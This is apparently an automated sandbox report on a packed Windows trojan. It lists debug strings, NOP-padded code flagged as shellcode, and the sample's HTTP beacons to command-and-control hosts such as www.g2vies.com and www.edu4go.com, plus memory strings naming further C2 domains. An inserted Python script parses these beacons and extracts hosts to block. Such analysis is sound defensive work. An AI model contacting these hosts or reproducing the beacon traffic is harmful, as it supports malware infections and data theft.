Source: Binary string: cdp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: profapi.pdba source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: InputHost.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ExplorerFrame.pdbmS< source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ntshrui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: drprov.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: IdStore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: wpnapps.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PortableDeviceApi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: UserMgrProxy.pdbSP source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.722744884.0000000001290000.00000040.00000001.sdmp, mstsc.exe, 00000006.00000002.1032811979.0000000004750000.00000040.00000001.sdmp
Source: Binary string: Windows.Shell.BlueLightReduction.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: TaskFlowDataEngine.pdbeS4 source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: propsys.pdbb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: davhlpr.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dlnashext.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Deviceovs.pdb source: WerFault.exe, 0000000A.00000002.761878802.000001EDC4EA8000.00000004.00000020.sdmp
Source: Binary string: EhStorShell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: XmlLite.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, mstsc.exe, 00000006.00000002.1034631298.0000000004C7F000.00000004.00000001.sdmp
Source: Binary string: WorkFoldersShell.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: batmeter.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cscui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: DWrite.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ResourcePolicyClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: MFPLAT.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: SyncCenter.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ApplicationFrame.pdb=SL source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdbv source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdbh source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000000A.00000003.726046312.000001EDC6DF6000.00000004.00000001.sdmp
Source: Binary string: Bcp47Langs.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: rtworkq.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ActionCenter.pdbASh source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryClient.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ExecModelProxy.pdbES source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: explorer.pdb source: WerFault.exe, 0000000A.00000003.725996524.000001EDC6DEA000.00000004.00000001.sdmp
Source: Binary string: twinui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Shell.Broker.pdbf source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: NPSMDesktopProvider.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: MMDevAPI.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Immersive.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: WPDShServiceObj.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: capauthz.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: hcproviders.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Wer.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: windows.ui.xaml.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: user32.pdb0 source: WerFault.exe, 0000000A.00000003.738993307.000001EDC6E48000.00000004.00000001.sdmp
Source: Binary string: wincorlib.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ntlanman.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL source: AddInProcess32.exe, 00000001.00000002.724998329.0000000002D60000.00000040.00000001.sdmp
Source: Binary string: IEProxy.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: devobj.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: policymanager.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WPDShServiceObj.pdb&uX source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: RmClient.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: StructuredQuery.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: UserMgrProxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: d2d1.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: PhotoMetadataHandler.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: SettingSyncPolicy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msvcp140.amd64.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msoshext.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ES.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows.pdb2R source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
Source: Binary string: TileDataRepository.pdb-S| source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdbm source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: Windows.ImmersiveShell.ServiceProvider.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: framedynos.pdbt8 source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: npmproxy.pdb?jO source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: staterepository.core.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: npmproxy.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: msxml6.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: DataExchange.pdb9S@ source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: twinapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: cryptngc.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: UIAnimation.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: DXP.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: WerFault.exe, 0000000A.00000003.740856862.000001EDC6DF0000.00000004.00000001.sdmp
Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 0000000A.00000003.729628969.000001EDC6F2D000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: edputil.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then push dword ptr [ebp-24h] 0_2_04AB7498
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_04AB7498
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_04AB6758
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_04AB83F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov esp, ebp 0_2_04ABDEF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then jmp 04AB276Eh 0_2_04AB1F98
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_04AB9481
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then push dword ptr [ebp-24h] 0_2_04AB7495
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_04AB7495
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then push dword ptr [ebp-20h] 0_2_04AB716C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_04AB716C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then push dword ptr [ebp-20h] 0_2_04AB7178
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_04AB7178
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then xor edx, edx 0_2_04AB73CD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then xor edx, edx 0_2_04AB73D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_04AB6C9D

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bsl/?2d=hxlpdRkxCvtTgBzP&mt=B72SzM4OK6YheLE+tS6SAH+1fBRAvDBThfWED1RPUqC7thw4cowf+3ukjA/mpLG53kNi HTTP/1.1 | Host: www.g2vies.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none; the body is seven NUL bytes)
Source: global traffic HTTP traffic detected: GET /bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP HTTP/1.1 | Host: www.edu4go.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none; the body is seven NUL bytes)
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLEUS
Source: SearchUI.exe, 00000016.00000003.839516541.000001B8D2042000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.@ equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: www.thesunchronical.com
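The two GET beacons above and the run-together /bsl/ URLs that follow in the explorer.exe memory strings can be triaged with a few lines of Python. The block below is an added example written for this page; it is not code from Joe Sandbox, from the sample, or from any FormBook tooling. The two request bodies and the memory-string excerpt are copied from the report lines (CRLF restored between headers, the seven-NUL body taken from the Data Raw field); the benign request is constructed for contrast, and the function names, the host regex and the "two or more traits" threshold are the example's own choices.

```python
"""
Added triage example (not part of the Joe Sandbox report): parse the two
flattened HTTP beacons listed under "HTTP GET or POST without a user agent"
and mine the explorer.exe memory strings for the rotating list of /bsl/ hosts.
Function names, regexes and the scoring threshold are this example's own.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed from the report's two "HTTP traffic detected" entries. The
# sandbox printed "Data Raw: 00 00 00 00 00 00 00", so the body is 7 NUL bytes.
SANDBOX_REQUESTS = [
    b"GET /bsl/?2d=hxlpdRkxCvtTgBzP&mt=B72SzM4OK6YheLE+tS6SAH+1fBRAvDBThfWED1RPUqC7thw4cowf+3ukjA/mpLG53kNi HTTP/1.1\r\n"
    b"Host: www.g2vies.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7,
    b"GET /bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP HTTP/1.1\r\n"
    b"Host: www.edu4go.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7,
]

# A benign request for contrast (constructed, not taken from the report).
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n"
)

# Constructed excerpt of the explorer.exe "String found in binary or memory"
# entries; adjacent config entries run together, hence host/bsl/host.
MEMORY_STRINGS = [
    "http://www.g2vies.com/bsl/www.edu4go.com",
    "http://www.g2vies.comReferer:",
    "http://www.edu4go.com/bsl/www.infomgt.net",
    "http://www.smoothsailingexpress.com/bsl/www.theprintshop.ink",
    "http://www.cbothwelltest2020081703.com/bsl/www.luohu666.com",
    "http://www.fontbureau.com/designers",      # font metadata, not C2
    "http://crl.globalsign.net/root-r2.crl0",  # certificate noise, not C2
]

HOST_RE = re.compile(r"www\.[a-z0-9-]+\.[a-z]{2,}")   # lower-case only: stops at "comReferer"
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")          # base64 alphabet, optional padding


@dataclass
class BeaconFinding:
    host: str
    path: str
    params: dict
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # One trait (e.g. a missing User-Agent) is common in benign tooling;
        # the combination is what separates this beacon from noise.
        return len(self.reasons) >= 2


def parse_http_request(raw: bytes):
    """Split a raw request into (method, target, headers, body); header names lower-cased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def assess_beacon(raw: bytes) -> BeaconFinding:
    """Score one request against the traits the report shows for this sample."""
    method, target, headers, body = parse_http_request(raw)
    url = urlsplit(target)
    # Split the query by hand: parse_qsl would turn '+' into a space and
    # corrupt the base64-looking values.
    params = dict(p.partition("=")[::2] for p in url.query.split("&") if p)
    f = BeaconFinding(headers.get("host", ""), url.path, params)
    if "user-agent" not in headers:
        f.reasons.append("no User-Agent header")
    if method == "GET" and body:
        f.reasons.append(f"GET carries a {len(body)}-byte body")
    if body and set(body) == {0}:
        f.reasons.append("body is all NUL bytes")
    if params and all(B64_RE.fullmatch(v) for v in params.values()):
        f.reasons.append("every query value is base64-alphabet only")
    return f


def extract_c2_hosts(strings, path="/bsl/"):
    """Hosts from memory strings that carry the beacon path; other URLs are ignored."""
    hosts = set()
    for s in strings:
        if path in s:
            hosts.update(HOST_RE.findall(s))
    return sorted(hosts)


if __name__ == "__main__":
    for req in SANDBOX_REQUESTS + [BENIGN_REQUEST]:
        finding = assess_beacon(req)
        print(finding.host, finding.path, finding.suspicious, finding.reasons)
    print(extract_c2_hosts(MEMORY_STRINGS))
```

Only www.g2vies.com and www.edu4go.com were actually contacted during the run (plus a DNS query for www.thesunchronical.com), but the memory strings show the whole rotation list, so the hunt and block list should be the full set returned by `extract_c2_hosts`, not just the two hosts seen on the wire. The path `/bsl/` is specific to this sample's configuration; other builds use a different path, so treat it as a parameter rather than a fixed indicator.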
Source: explorer.exe, 00000010.00000003.836779593.00000000062E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: SearchUI.exe, 00000016.00000002.914254001.000001B8D1BAF000.00000004.00000001.sdmp String found in binary or memory: http://facebook.github.io/react/docs/error-decoder.html?invariant
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp String found in binary or memory: http://ns.adb
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.668183280.00000000082A1000.00000004.00000001.sdmp String found in binary or memory: http://ns.ado/1
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.668183280.00000000082A1000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.c/g
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.668183280.00000000082A1000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cobj
Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/WebPage
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683345162.00000000024A1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000002.00000002.751926871.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.cbothwelltest2020081703.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.cbothwelltest2020081703.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.cbothwelltest2020081703.com/bsl/www.luohu666.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.cbothwelltest2020081703.comReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.edu4go.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.edu4go.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.edu4go.com/bsl/www.infomgt.net
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.edu4go.comReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.estivalconsultancy.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.estivalconsultancy.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.estivalconsultancy.com/bsl/www.furnacerepairtacoma.net
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.estivalconsultancy.comReferer:
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.furnacerepairtacoma.net
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.furnacerepairtacoma.net/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.furnacerepairtacoma.net/bsl/www.listenmelody.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.furnacerepairtacoma.netReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.g2vies.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.g2vies.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.g2vies.com/bsl/www.edu4go.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.g2vies.comReferer:
